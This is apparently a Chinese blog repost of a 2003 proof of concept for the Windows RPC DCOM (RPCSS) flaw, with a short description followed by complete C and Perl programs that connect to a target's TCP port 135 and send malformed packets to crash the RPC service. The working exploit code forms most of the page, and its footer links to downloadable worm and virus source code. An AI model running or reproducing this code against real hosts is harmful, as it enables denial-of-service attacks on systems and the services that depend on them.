RPC蠕虫病毒主要技术源代码

安全焦点网站于2003年7月21日发布了该漏洞的测试代码,现在的RPC蠕虫基本上是利用了该代码,我们现在转载该代码供大家研究。
WINDOWS的RPC服务(RPCSS)存在漏洞,当发送一个畸形包的时候,会导致RPC服务无提示的崩溃掉。由于RPC服务是一个特殊的系统服务,许多应用和服务程序都依赖于他,因为可以造成这些程序与服务的拒绝服务。同时可以通过劫持epmapper管道和135端口的方法来提升权限和获取敏感信息。

代码
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};


void main(int argc,char ** argv)
{
  WSADATA WSAData;
int i;
  SOCKET sock;
  SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org/n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org/n");
printf("Welcome to http://www.xfocus.net/n");
if(argc<2)
{
 printf("useage:%s target/n",argv[0]);
exit(1);
}


  if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  {
    printf("WSAStartup error.Error:%d/n",WSAGetLastError());
    return;
  }

  addr_in.sin_family=AF_INET;
  addr_in.sin_port=htons(port);
  addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  {
    printf("Socket failed.Error:%d/n",WSAGetLastError());
    return;
  }
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
 printf("Connect failed.Error:%d",WSAGetLastError());
 return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
  printf("Send failed.Error:%d/n",WSAGetLastError());
  return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
  printf("Send failed.Error:%d/n",WSAGetLastError());
  return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}


#!/usr/bin/perl -w
# By SecurITeam"s Experts
my $bindstr = "/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x7F/x00/x00/x00/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x01/x00/xA0/x01/x00/x00/x00/x00/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x46/x00/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";

my $request = "/x05/x00/x00/x03/x10/x00/x00/x00/x48/x00/x00/x00/x13/x00/x00/x00/x90/x00/x00/x00/x01/x00/x03/x00/x05/x00/x06/x01/x00/x00/x00/x00/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x31/x00/x00/x00/x00/x00/x00/x00/x00";

use Socket;
$proto = getprotobyname("tcp");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems/n");

$IP = $ARGV[0];
$target = inet_aton($IP);
$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;
sleep(2);

select(STDOUT);
close(S);

 

阅读更多
个人分类: 病毒研究
上一篇VBS.LoveLetter.CI病毒源代码
下一篇MSBlast.Remove.Worm W32蠕虫病毒主代码
想对作者说点什么? 我来说一句

易语言蠕虫病毒源码

2016年02月26日 260KB 下载

蠕虫病毒源码

2012年07月12日 88KB 下载

vc编写的蠕虫病毒源代码

2009年09月23日 105KB 下载

worm 蠕虫病毒 源代码

2011年04月16日 23KB 下载

感染型病毒源码

2014年04月23日 219KB 下载

没有更多推荐了,返回首页

关闭
关闭